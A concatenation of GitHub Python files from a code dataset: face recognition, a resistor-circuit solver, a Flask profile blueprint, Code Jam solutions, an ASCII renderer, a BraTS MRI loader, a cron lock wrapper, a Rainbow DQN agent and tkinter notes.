write_frame_list, Global, worker_num,)))\n# p[worker_id].start()\n\n# # Start to show video\n# last_num = 1\n# fps_list = []\n# tmp_time = time.time()\n# while not Global.is_exit:\n# while Global.write_num != last_num:\n# last_num = int(Global.write_num)\n\n# # Calculate fps\n# delay = time.time() - tmp_time\n# tmp_time = time.time()\n# fps_list.append(delay)\n# if len(fps_list) > 5 * worker_num:\n# fps_list.pop(0)\n# fps = len(fps_list) / np.sum(fps_list)\n# print(\"fps: %.2f\" % fps)\n\n# # Calculate frame delay, in order to make the video look smoother.\n# # When fps is higher, should use a smaller ratio, or fps will be limited in a lower value.\n# # Larger ratio can make the video look smoother, but fps will hard to become higher.\n# # Smaller ratio can make fps higher, but the video looks not too smoother.\n# # The ratios below are tested many times.\n# if fps < 6:\n# Global.frame_delay = (1 / fps) * 0.75\n# elif fps < 20:\n# Global.frame_delay = (1 / fps) * 0.5\n# elif fps < 30:\n# Global.frame_delay = (1 / fps) * 0.25\n# else:\n# Global.frame_delay = 0\n\n# # Display the resulting image\n# cv2.imshow('Video', write_frame_list[prev_id(Global.write_num, worker_num)])\n\n# # Hit 
'q' on the keyboard to quit!\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# Global.is_exit = True\n# break\n\n# time.sleep(0.01)\n\n# # Quit\n# cv2.destroyAllWindows()\n","repo_name":"Ayad-Mihidabi-Khan-Jitu/Workspace-Learning","sub_path":"DataScience/OpenCV/Face_Recognition_IP_Cam_with_face-recognition_1_3_0.py","file_name":"Face_Recognition_IP_Cam_with_face-recognition_1_3_0.py","file_ext":"py","file_size_in_byte":15645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8908046879","text":"n = int(input())\n\nR_tbl = dict() # Create a dictionary to store the resitor\n\nfor i in range(n):\n name, r = input().split()\n R_tbl[name] = int(r)\n\ncircuit = input().split(\" \")\n\nlist = []\nfor c in circuit:\n if c == ')':\n i = list.index('(')\n r = sum(R_tbl[x] for x in list[0:i])\n del list[0:i+1]\n R_tbl[r]=r\n list.insert(0,r)\n elif c == ']':\n i = list.index('[')\n r = 1/sum(1/R_tbl[x] for x in list[0:i])\n del list[0:i+1]\n R_tbl[r]=r\n list.insert(0,r)\n else:\n list.insert(0,c)\n\nprint(\"%.1f\" % list[0])\n","repo_name":"AnnickWONG/CodinGame","sub_path":"EASY/Equivalent Resistance, Circuit Building/Equivalent_Resistance.py","file_name":"Equivalent_Resistance.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39220400650","text":"# Implement all CRUD elements\n# Reference this: https://github.com/jacobtie/itsc-3155-module-10-demo/blob/main/blueprints/book_blueprint.py\nfrom flask import Blueprint, abort, redirect, render_template, request, session\nfrom models import Comment, Follower, Post, Userprofile, db\n\nrouter = Blueprint('user_profile_router', __name__, url_prefix='/user_profile')\n\n# Hirdhay\n@router.get('')\ndef get_all_user_profile():\n # if the user is not logged in it aborts to 401\n if not 'user' in session:\n abort(401)\n\n all_users = Userprofile.query.all()\n return render_template('all_users.html', users = all_users, user_in_session = session['user']['user_id'])\n\n# Haley\n@router.get('/')\ndef get_single_user_profile(user_id):\n # if the user is not logged in it aborts to 401\n if not 'user' in session:\n abort(401)\n followercount = Follower.query.filter_by(following_id=user_id).count()\n single_user_profile = Userprofile.query.get_or_404(user_id)\n \n isFollowing = False\n x = Follower.query.filter_by(follower_id=session['user']['user_id'], following_id=user_id).first()\n if x is not None:\n isFollowing = True\n \n postnum = Post.query.filter_by(user_id=user_id).count()\n followingcount = Follower.query.filter_by(follower_id=user_id).count()\n\n return render_template('single_user_profile.html', user = single_user_profile, user_in_session = session['user']['user_id'], followercount = followercount, postnum = postnum, followingcount = followingcount, isFollowing = isFollowing)\n\n# Hirdhay\n@router.get('//edit')\ndef get_edit_user_profile_form(user_id):\n user_to_edit = Userprofile.query.get_or_404(user_id)\n return render_template('editprofile.html', user = user_to_edit, user_in_session = session['user']['user_id'])\n\n# Hirdhay\n@router.post('/')\ndef update_user_profile(user_id):\n user_to_update = Userprofile.query.get_or_404(user_id)\n name = request.form.get('name', '')\n location = request.form.get('location', '')\n biography = request.form.get('biography', '')\n\n if location == '' or biography == '':\n abort(400)\n\n\n user_to_update.user_location = location\n user_to_update.user_biography = 
biography\n\n db.session.commit()\n\n #return redirect(f'/user_profile/{user_id}', user_in_session = session['user']['user_id'])\n return redirect(f'/user_profile/{user_id}')\n \n# Hirdhay\n@router.post('//delete')\ndef delete_user_profile(user_id):\n print(\"here\" + user_id)\n user_to_endit = Userprofile.query.get_or_404(user_id)\n\n #must delete all posts made by user and all comments related to post made by said user\n posts_to_delete = Post.query.filter_by(user_id=user_to_endit.user_id).all() \n for post in posts_to_delete: #you have to delete all comments related to that post before deleting the post\n comments_to_delete = Comment.query.filter_by(post_id=post.post_id).all()\n for comment in comments_to_delete: #you have to delete all comments related to that post before deleting the post\n db.session.delete(comment)\n db.session.delete(post)\n \n comments_by_user = Comment.query.filter_by(user_id=user_to_endit.user_id).all()\n\n #have to delete all comments made by said user\n for comment in comments_by_user:\n db.session.delete(comment)\n\n follow1 = Follower.query.filter_by(follower_id=user_to_endit.user_id).all()\n follow2 = Follower.query.filter_by(following_id=user_to_endit.user_id).all()\n #delete from follower-follower\n for follow in follow1:\n db.session.delete(follow)\n for follow in follow2:\n db.session.delete(follow)\n\n #sign user out\n if 'user' not in session:\n abort(401)\n\n # delete the user session\n del session['user']\n #finally delete user\n db.session.delete(user_to_endit)\n db.session.commit()\n return redirect('/')\n\n@router.post('//follow')\ndef follow_user(user_id):\n follower_id = session['user']['user_id']\n following_id = user_id\n\n already = Follower.query.filter_by(follower_id=follower_id, following_id=following_id).first()\n print(already)\n\n\n if already is not None:\n db.session.delete(already)\n else:\n new = Follower(follower_id=follower_id, following_id=following_id)\n db.session.add(new)\n\n db.session.commit()\n\n\n return redirect(f'/user_profile/{user_id}')\n\n","repo_name":"thompaw/3155Project","sub_path":"blueprints/user_profile_blueprint.py","file_name":"user_profile_blueprint.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23454391411","text":"#!python\r\n#shyness.py\r\nimport sys\r\n\r\ndef main(argv):\r\n file = open(\"A-large.in\", 'r')\r\n out = open(\"ouputshyness.txt\", 'w')\r\n \r\n cases = int(file.readline())\r\n on_case = 1\r\n \r\n for line in file:\r\n case = line.split(' ')\r\n max = int(case[0])\r\n standing = 0\r\n friends = 0\r\n for i in range(0, max + 1):\r\n if standing < i:\r\n friends += i - standing\r\n standing = i\r\n standing += int(case[1][i])\r\n \r\n out.write('Case #' + str(on_case) + ': ' + str(friends) + '\\n')\r\n on_case += 1\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3221.py","file_name":"3221.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19029559304","text":"\"\"\"\nGiven a list of words like so:\nwords = [\n 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n 'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n 'my', 'eyes', \"you're\", 'under'\n]\nWrite a python snippet to find the words that 
occur most often. Your output should look something like the following:\n[('eyes', 8), ('the', 5), ('look', 4)]\n\"\"\"\n\nimport operator\n\nclass WordCounter(object):\n\n    def __init__(self, wordList):\n        self.workList = sorted(wordList)\n        self.wordLister()\n\n    def wordLister(self):\n        self.counted = {}\n        for word in self.workList:\n            if not word in self.counted:\n                self.counted[word] = 0\n            self.counted[word] += 1 \n        self.summaryList = sorted(self.counted.items(), key = operator.itemgetter(1), reverse = True)\n\n        print(self.summaryList)\n\nwords = [\n    'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n    'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n    'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n    'my', 'eyes', \"you're\", 'under'\n]\n\nrezo = WordCounter(words)\n\n","repo_name":"shoe61/2143-OOP-Schumacher","sub_path":"scraps/underDog.py","file_name":"underDog.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23569854281","text":"from math import ceil\n\ndef solve(a, b, mans):\n    if mans == 1:\n        return (int((b-a)/2) + (b-a)%2 - 1, int((b-a)/2 - 1))\n    else:\n        if (b-a)%2:\n            t = mans%2\n            t = 0 if t == 1 else 1\n            return solve(a, int(b/2) + t, int(mans/2))\n        else:\n            return solve(a, int(b/2) + 1, int(mans/2))\n\n\nt = int(input())\n\nfor i in range(1, t + 1):\n    n, k = [int(s) for s in input().split(\" \")]\n\n    l = solve(1, n+2, k)\n    print (\"Case #{0}: {1} {2}\".format(i, l[0], l[1]))\n\n\n\n    \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2278.py","file_name":"2278.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25447877658","text":"from PIL import Image\n\nASCII_CHARS = \"MNHQ$OC?7>!:-;. 
\"\nNUM_ASCII_CHARS = len(ASCII_CHARS)\n\n\ndef render_frame(frame, width, height):\n scaled_image = frame.resize((width, height), Image.BILINEAR)\n pixels = scaled_image.load()\n\n string = \"\"\n for row in range(height):\n for col in range(width):\n pixel = pixels[col, row] # RGB\n rgb = pixel[:3]\n avg_rgb = sum(rgb) / 3.0\n string += ASCII_CHARS[int(avg_rgb / 256.0 * NUM_ASCII_CHARS)]\n\n string += \"\\n\"\n return string\n\n\ndef render_ascii_art(image, width, height):\n while True:\n try:\n yield render_frame(image.convert(\"RGB\"), width, height)\n image.seek(image.tell() + 1)\n except EOFError:\n break\n\n\ndef get_image_duration(image):\n return image.info.get(\"duration\", 1000)\n\n","repo_name":"kabisa/falcon_ascii_renderer","sub_path":"app/ascii/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40097354034","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nimport numpy as np\n\nimport os\nfrom glob import glob\n\nimport gdown\nimport nibabel as nib\nfrom zipfile import ZipFile\nfrom tqdm import tqdm\nfrom skimage.transform import resize\n\n\n\nclass Brats2020Dataset2020(Dataset):\n\n URL = 'https://drive.google.com/uc?id=1fjhJKi6Cs71MpbTa_u4oHHKF3rO41F97&export=download'\n OUT_FILE = 'micca_train_2.zip'\n UNZIP_FOLDER = 'dataset/miccai_train'\n\n def __init__(self, root, train=True, transform=None, download=False, resize_=True, normalize_ = True):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.train = train # training set or test set\n self.UNZIP_FOLDER = os.path.join(self.root, self.UNZIP_FOLDER)\n self.resize_ = resize_\n self.normalize_ = normalize_\n # Creating necessary Directories\n self.make_dirs()\n\n if download and not self._check_exists():\n self.download()\n self.extract()\n self.arrange()\n\n if not self._check_exists():\n raise RuntimeError('Dataset not found.' 
+\n                               ' You can use download=True to download it')\n\n        self.folder_prefix = \"BraTS20_Training\"\n        self.all_files = glob(os.path.join(\n            self.UNZIP_FOLDER) + \"/{instance_folder}*/{instance_folder}*.gz\".format(instance_folder=self.folder_prefix))\n        self.images_t1c = np.array(\n            sorted([file for file in self.all_files if file.endswith('t1ce.nii.gz')]))\n        self.images_seg = np.array(\n            sorted([file for file in self.all_files if file.endswith('seg.nii.gz')]))\n        # np.random.seed(42)\n        self.perm = np.random.permutation(len(self.images_t1c))\n        self.split = int(0.8 * len(self.perm))\n\n        if self.train:\n            self.images_t1c = self.images_t1c[self.perm[:self.split]]\n            self.images_seg = self.images_seg[self.perm[:self.split]]\n        else:\n            self.images_t1c = self.images_t1c[self.perm[self.split:]]\n            self.images_seg = self.images_seg[self.perm[self.split:]]\n\n    def _check_exists(self):\n        return os.path.exists(self.UNZIP_FOLDER)\n\n    def make_dirs(self):\n        dirslist = [self.UNZIP_FOLDER]\n        for dir_ in dirslist:\n            if not os.path.exists(dir_):\n                os.mkdir(dir_)\n\n    def download(self):\n        print(\"Download Started !!!\")\n        gdown.download(self.URL, output=None, quiet=False)\n        print(\"Download Finished !!!\")\n\n    def extract(self):\n        print(\"Unzipping the File\")\n        with ZipFile(file=os.path.join(self.root, self.OUT_FILE)) as zip_file:\n            for file in tqdm(iterable=zip_file.namelist(), total=len(zip_file.namelist())):\n                zip_file.extract(\n                    member=file, path=os.path.join(self.root, 'dataset'))\n        print(\"Done\")\n\n    def arrange(self):\n        # Removing the Zipped File\n        print(\"Removing the Zipped File\")\n        self.zipfile_ = os.path.join(self.root, self.OUT_FILE)\n        if os.path.exists(self.zipfile_):\n            os.remove(self.zipfile_)\n        print(\"Removing the unwanted files\")\n\n        self.folder_prefix = \"BraTS20_Training\"\n        self.all_files = glob(os.path.join(\n            self.UNZIP_FOLDER) + \"/{instance_folder}*/{instance_folder}*.gz\".format(instance_folder=self.folder_prefix))\n        for i in self.all_files:\n            if not i.endswith('t1ce.nii.gz') and not i.endswith('seg.nii.gz'):\n                os.remove(i)\n\n    def resize(self, data: np.ndarray):\n        data = resize(data, (80, 120, 120), preserve_range=True)\n        return data\n\n    def normalize(self, data: np.ndarray):\n        data_min = np.min(data)\n        return (data - data_min) / (np.max(data) - data_min)\n\n    def __len__(self):\n        return len(self.images_t1c)\n\n    def __getitem__(self, index):\n\n        img, target = nib.load(self.images_t1c[index]), nib.load(self.images_seg[index])\n        \n        img, target = img.get_fdata(), target.get_fdata()\n\n        target = ((target == 1) | (target == 4)).astype('float32')\n\n        # target = np.clip(target.astype(np.uint8), 0, 1).astype(np.float32)\n        # target = np.clip(target, 0, 1)\n\n        if self.normalize_:\n            img = self.normalize(img)\n\n        if self.transform:\n            img = self.transform(img)\n            target = self.transform(target)\n\n        if self.resize_:\n            img = self.resize(img)\n            target = self.resize(target)\n\n        \n        # Add a single channel dimension \n        img = torch.FloatTensor(img).unsqueeze(0)\n        target = torch.FloatTensor(target).unsqueeze(0)\n        return img, target\n    \n","repo_name":"rohitkuk/Brain_Tumour_Segmentation_3D_MRI","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20829440997","text":"def reverse_string(str1): \r\n    rev_str = \"\"\r\n    for i in range(len(str1)-1,-1,-1):\r\n        rev_str+=str1[i]\r\n    return rev_str\r\n\r\nprint(\"***** REVERSE A STRING *****\")\r\nch = 'y'\r\nwhile(ch=='y' or 
ch=='Y'):\r\n a = input(\"\\nEnter a String: \")\r\n print(\"Reverse of \", a,\" is: \", reverse_string(a))\r\n\r\n ch = input(\"\\nWant to continue?(y/n): \")\r\ninput()\r\n","repo_name":"BhoomikaSingh20/Python","sub_path":"curves_using_matplotlib_numpy.py","file_name":"curves_using_matplotlib_numpy.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3615851167","text":"class Search(object):\n \"\"\"description of class\"\"\"\n @staticmethod\n def BS(list, key):\n low = 0\n high = len(list) - 1\n while (low <= high):\n mid = int((low + high) / 2)\n guess = list[mid]\n if (guess == key):\n return mid\n if (guess < key):\n low = mid + 1\n else:\n high = mid - 1\n return None","repo_name":"Mohamed-Gnana/Grokking-Algorithms","sub_path":"ChapterOne/BinarySearchPython/BinarySearchPython/Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22022388613","text":"#!/usr/bin/env python3\n\n\"\"\"Wrapper that adds exclusive locks, timeouts, timestamp accounting,\nmax frequency, logging, etc... to running cron jobs.\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport sys\nfrom typing import Optional\n\nfrom pyutils import bootstrap, config, exec_utils, stopwatch\nfrom pyutils.datetimes import datetime_utils\nfrom pyutils.exceptions import PyUtilsLockfileException\nfrom pyutils.files import file_utils, lockfile\n\nlogger = logging.getLogger(__name__)\n\ncfg = config.add_commandline_args(\n f\"Python Cron Runner ({__file__})\",\n \"Wrapper for cron commands with locking, timeouts, and accounting.\",\n)\ncfg.add_argument(\n \"--lockfile\",\n default=None,\n metavar=\"LOCKFILE_PATH\",\n help=\"Path to the lockfile to use to ensure that two instances of a command do not execute contemporaneously.\",\n)\ncfg.add_argument(\n \"--lockfile_audit_record\",\n default=None,\n metavar=\"LOCKFILE_AUDIT_RECORD_FILENAME\",\n help=\"Path to a record of when the logfile was held/released and for what reason\",\n)\ncfg.add_argument(\n \"--timeout\",\n type=str,\n metavar=\"TIMEOUT\",\n default=None,\n help='Maximum time for lock acquisition + command execution. Undecorated for seconds but \"3m\" or \"1h 15m\" work too.',\n)\ncfg.add_argument(\n \"--timestamp\",\n type=str,\n metavar=\"TIMESTAMP_FILE\",\n default=None,\n help=\"The /timestamp/TIMESTAMP_FILE file tracking the work being done; files' mtimes will be set to the last successful run of a command for accounting purposes.\",\n)\ncfg.add_argument(\n \"--max_frequency\",\n type=str,\n metavar=\"FREQUENCY\",\n default=None,\n help='The maximum frequency with which to do this work; even if the wrapper is invoked more often than this it will not run the command. Requires --timestamp. 
Undecorated for seconds but \"3h\" or \"1h 15m\" work too.',\n)\ncfg.add_argument(\n \"--command\",\n nargs=\"*\",\n required=True,\n type=str,\n metavar=\"COMMANDLINE\",\n help=\"The commandline to run under a lock.\",\n)\nconfig.overwrite_argparse_epilog(\n \"\"\"\ncron.py's exit value:\n\n -1000 = some internal error occurred (see exception log).\n 0 = we exited early due to not enough time passage since the last\n invocation of --command.\n 1000 = we could not obtain the lockfile; someone else owns it.\n else = if the --command was run successfully, cron.py will exit with\n the same code that the subcommand exited with.\n\"\"\"\n)\n\n\ndef run_command(timeout: Optional[int], timestamp_file: Optional[str]) -> int:\n \"\"\"Run cron command\"\"\"\n cmd = \" \".join(config.config[\"command\"])\n logger.info('cron cmd = \"%s\"', cmd)\n logger.debug(\"shell environment:\")\n for var in os.environ:\n val = os.environ[var]\n logger.debug(\"%s = %s\", var, val)\n logger.debug(\"____ (↓↓↓ output from the subprocess appears below here ↓↓↓) ____\")\n try:\n with stopwatch.Timer() as t:\n ret = exec_utils.cmd_exitcode(cmd, timeout)\n logger.debug(\n \"____ (↑↑↑ subprocess finished in %.2fss, exit value was %d ↑↑↑) ____\",\n t(),\n ret,\n )\n if ret == 0 and timestamp_file is not None and os.path.exists(timestamp_file):\n logger.debug(\"Touching %s\", timestamp_file)\n file_utils.touch_file(timestamp_file)\n return ret\n except Exception:\n msg = \"Cron subprocess failed; giving up.\"\n logger.exception(msg)\n print(\"Cron subprocess failed, giving up.\", file=sys.stderr)\n return -1000\n\n\n@bootstrap.initialize\ndef main() -> int:\n \"\"\"Entry point\"\"\"\n if config.config[\"timestamp\"]:\n timestamp_file = f\"/timestamps/{config.config['timestamp']}\"\n if not file_utils.does_file_exist(timestamp_file):\n logger.error(\n \"--timestamp argument's target file (%s) must already exist.\",\n timestamp_file,\n )\n sys.exit(-1)\n else:\n timestamp_file = None\n if config.config[\"max_frequency\"]:\n config.error(\n \"The --max_frequency argument requires the --timestamp argument.\"\n )\n\n now = datetime.datetime.now()\n if timestamp_file is not None and os.path.exists(timestamp_file):\n max_frequency = config.config[\"max_frequency\"]\n if max_frequency is not None:\n max_delta = datetime_utils.parse_duration(max_frequency)\n if max_delta > 0:\n mtime = file_utils.get_file_mtime_as_datetime(timestamp_file)\n delta = now - mtime\n if delta.total_seconds() < max_delta:\n logger.info(\n \"It's only been %s since we last ran successfully; bailing out.\",\n datetime_utils.describe_duration_briefly(delta.total_seconds()),\n )\n sys.exit(0)\n\n timeout = config.config[\"timeout\"]\n if timeout is not None:\n timeout = datetime_utils.parse_duration(timeout)\n assert timeout > 0\n logger.debug(\"Timeout is %ss\", timeout)\n lockfile_expiration = datetime.datetime.now().timestamp() + timeout\n else:\n logger.warning(\"Timeout not specified; no lockfile expiration.\")\n lockfile_expiration = None\n\n lockfile_path = config.config[\"lockfile\"]\n if lockfile_path is not None:\n logger.debug(\"Attempting to acquire lockfile %s...\", lockfile_path)\n try:\n with lockfile.LockFile(\n lockfile_path,\n do_signal_cleanup=True,\n override_command=\" \".join(config.config[\"command\"]),\n expiration_timestamp=lockfile_expiration,\n ) as lf:\n record = config.config[\"lockfile_audit_record\"]\n cmd = \" \".join(config.config[\"command\"])\n if record:\n start = lf.locktime\n with open(record, \"a\") as wf:\n 
print(f\"{lockfile_path}, ACQUIRE, {start}, {cmd}\", file=wf)\n retval = run_command(timeout, timestamp_file)\n if record:\n end = datetime.datetime.now().timestamp()\n duration = datetime_utils.describe_duration_briefly(end - start)\n with open(record, \"a\") as wf:\n print(\n f\"{lockfile_path}, RELEASE({duration}), {end}, {cmd}\",\n file=wf,\n )\n return retval\n except PyUtilsLockfileException:\n msg = f\"Failed to acquire {lockfile_path}, giving up.\"\n logger.exception(msg)\n print(msg, file=sys.stderr)\n return 1000\n else:\n logger.debug(\"No lockfile indicated; not locking anything.\")\n return run_command(timeout, timestamp_file)\n\n\nif __name__ == \"__main__\":\n # Insist that our logger.whatever('messages') make their way into\n # syslog with a facility=LOG_CRON, please. Yes, this is hacky.\n sys.argv.append(\"--logging_syslog\")\n sys.argv.append(\"--logging_syslog_facility=CRON\")\n main()\n","repo_name":"scottgasch/pyutils","sub_path":"examples/cron/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"17822470101","text":"import math, random\nfrom simulation import *\n#import gym\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd \nimport torch.nn.functional as F\n\nfrom common.layers import NoisyLinear\nfrom common.replay_buffer import ReplayBuffer\nfrom gen_dataset import *\nUSE_CUDA = torch.cuda.is_available()\nVariable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs).cuda() if USE_CUDA else autograd.Variable(*args, **kwargs)\n\n\nclass RainbowDQN(nn.Module):\n def __init__(self, num_inputs, num_actions, num_atoms, Vmin, Vmax):\n super(RainbowDQN, self).__init__()\n \n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.num_atoms = num_atoms\n self.Vmin = Vmin\n self.Vmax = Vmax\n # Markovian\n numNodes = 16\n # NonMarkovian\n # numNodes = 48\n\n self.linear1 = nn.Linear(num_inputs, numNodes)\n self.linear2 = nn.Linear(numNodes, numNodes)\n \n # numNodes = 16\n\n self.noisy_value1 = NoisyLinear(numNodes, numNodes, use_cuda=USE_CUDA)\n self.noisy_value2 = NoisyLinear(numNodes, self.num_atoms, use_cuda=USE_CUDA)\n \n self.noisy_advantage1 = NoisyLinear(numNodes, numNodes, use_cuda=USE_CUDA)\n self.noisy_advantage2 = NoisyLinear(numNodes, self.num_atoms * self.num_actions, use_cuda=USE_CUDA)\n \n def forward(self, x):\n batch_size = x.size(0)\n \n x = F.relu(self.linear1(x))\n x = F.relu(self.linear2(x))\n \n value = F.relu(self.noisy_value1(x))\n value = self.noisy_value2(value)\n \n advantage = F.relu(self.noisy_advantage1(x))\n advantage = self.noisy_advantage2(advantage)\n \n value = value.view(batch_size, 1, self.num_atoms)\n advantage = advantage.view(batch_size, self.num_actions, self.num_atoms)\n \n x = value + advantage - advantage.mean(1, keepdim=True)\n x = F.softmax(x.view(-1, self.num_atoms)).view(-1, self.num_actions, self.num_atoms)\n \n return x\n \n def reset_noise(self):\n self.noisy_value1.reset_noise()\n self.noisy_value2.reset_noise()\n self.noisy_advantage1.reset_noise()\n self.noisy_advantage2.reset_noise()\n \n def act(self, state):\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n dist = self.forward(state).data.cpu()\n dist = dist * torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n action = dist.sum(2).max(1)[1].numpy()[0]\n return action\n\n\n\ndef update_target(current_model, 
target_model):\n target_model.load_state_dict(current_model.state_dict())\n\ndef projection_distribution(next_state, rewards, dones,Vmax,Vmin,num_atoms,target_model,batch_size):\n batch_size = next_state.size(0)\n \n delta_z = float(Vmax - Vmin) / (num_atoms - 1)\n support = torch.linspace(Vmin, Vmax, num_atoms)\n \n next_dist = target_model(next_state).data.cpu() * support\n next_action = next_dist.sum(2).max(1)[1]\n next_action = next_action.unsqueeze(1).unsqueeze(1).expand(next_dist.size(0), 1, next_dist.size(2))\n next_dist = next_dist.gather(1, next_action).squeeze(1)\n \n rewards = rewards.unsqueeze(1).expand_as(next_dist)\n dones = dones.unsqueeze(1).expand_as(next_dist)\n support = support.unsqueeze(0).expand_as(next_dist)\n \n Tz = rewards + (1 - dones) * 0.99 * support\n Tz = Tz.clamp(min=Vmin, max=Vmax)\n b = (Tz - Vmin) / delta_z\n l = b.floor().long()\n u = b.ceil().long()\n \n offset = torch.linspace(0, (batch_size - 1) * num_atoms, batch_size).long()\\\n .unsqueeze(1).expand(batch_size, num_atoms)\n\n proj_dist = torch.zeros(next_dist.size()) \n proj_dist.view(-1).index_add_(0, (l + offset).view(-1), (next_dist * (u.float() - b)).view(-1))\n proj_dist.view(-1).index_add_(0, (u + offset).view(-1), (next_dist * (b - l.float())).view(-1))\n \n return proj_dist\n\ndef compute_td_loss(batch_size,replay_buffer,Vmax,Vmin,num_atoms,current_model,target_model,optimizer):\n state, action, reward, next_state, done = replay_buffer.sample(batch_size) \n #print('Vmax = ',Vmax)\n \n state = Variable(torch.FloatTensor(np.float32(state)))\n next_state = Variable(torch.FloatTensor(np.float32(next_state)), volatile=True)\n action = Variable(torch.LongTensor(action))\n reward = torch.FloatTensor(reward)\n done = torch.FloatTensor(np.float32(done))\n #print(state)\n proj_dist = projection_distribution(next_state, reward, done,Vmax,Vmin,num_atoms,target_model,batch_size)\n \n dist = current_model(state)\n action = action.unsqueeze(1).unsqueeze(1).expand(batch_size, 1, num_atoms)\n dist = dist.gather(1, action).squeeze(1)\n dist.data.clamp_(0.01, 0.99)\n loss = -(Variable(proj_dist) * dist.log()).sum(1)\n loss = loss.mean()\n #print(loss) \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n current_model.reset_noise()\n target_model.reset_noise()\n \n return loss\n\nif __name__ == \"__main__\":\n path = './model/modelps1.pt'\n ps = 1\n n = 10\n dict1 = gen_data(n)\n\n num_input = 3\n \n action_dict = dict()\n actions = [32,48,64,80,96,112,128]\n for i in range(len(actions)):\n action_dict[i]=actions[i]\n\n other_action_dict = dict()\n other_action_dict[0] = 32\n other_action_dict[1] = 128\n\n num_states = 3\n num_action = len(actions)\n eplen = 20\n\n env = commEnv(ps,dict1,action_dict,other_action_dict,eplen)\n \n\n # env = commEnv(ps,dict1,action_dict)\n\n\n num_atoms = 5\n Vmin = 16\n Vmax = 20\n\n current_model = RainbowDQN(num_input, num_action, num_atoms, Vmin, Vmax)\n target_model = RainbowDQN(num_input, num_action, num_atoms, Vmin, Vmax)\n\n if USE_CUDA:\n current_model = current_model.cuda()\n target_model = target_model.cuda()\n \n optimizer = optim.Adam(current_model.parameters(), 0.0001)\n\n replay_buffer = ReplayBuffer(10000)\n\n update_target(current_model, target_model)\n\n num_frames = 10000\n batch_size = 32\n gamma = 1\n\n losses = []\n all_rewards = []\n episode_reward = 0\n\n state = env.reset()\n # print(state)\n for frame_idx in range(1, num_frames + 1):\n action = current_model.act(state)\n # print('action = ',action) \n next_state, reward, done, _= 
env.step(action)\n replay_buffer.push(state, action, reward, next_state, done)\n \n #print(reward)\n state = next_state\n #print(cw_min)\n episode_reward += reward\n if episode_reward > 195:\n break \n if done:\n print('Frame = ',frame_idx,'Reward = ',episode_reward)\n state= env.reset()\n all_rewards.append(episode_reward)\n episode_reward = 0\n \n if len(replay_buffer) > batch_size:\n #print('======================================= Start Training =========================================')\n loss = compute_td_loss(batch_size,replay_buffer,Vmax,Vmin,num_atoms,current_model,target_model,optimizer)\n #print(loss)\n losses.append(loss.data)\n #if frame_idx % 200 == 0:\n # plot(frame_idx, all_rewards, losses)\n \n if frame_idx % 500 == 0:\n update_target(current_model, target_model)\n #print(all_rewards)\n torch.save(current_model.state_dict(),path)","repo_name":"kumarabhish3k/Rainbow-DQN-for-Contention-Window-design","sub_path":"rainbow.py","file_name":"rainbow.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11679007807","text":"'''\n\tPython learning \n\tday1.py\n'''\nfrom tkinter import *\nfrom tkinter.ttk import *\n########################################################################\n'''\nevent\n'''\n# def display(event):\n# \tglobal root\n# \tw2=Label(root,text=\"Hello,World!\")\n# \tw2.pack()\n\n\n# root =Tk()\n# b1=Button(root,text=\"Click me!\")\n# b1['width']=20\n# b1['height']=4\n# # b1['background']='red'\n# b1.bind(\"<Button-1>\",display)\n# b1.pack()\n\n# root.mainloop()\n########################################################################\n'''\npack()\n'''\n# root =Tk()\n# Button(root,text='A').pack(side=LEFT,expand=YES,fill=Y)\n# Button(root,text='B').pack(side=TOP,expand=NO,fill=BOTH)\n# 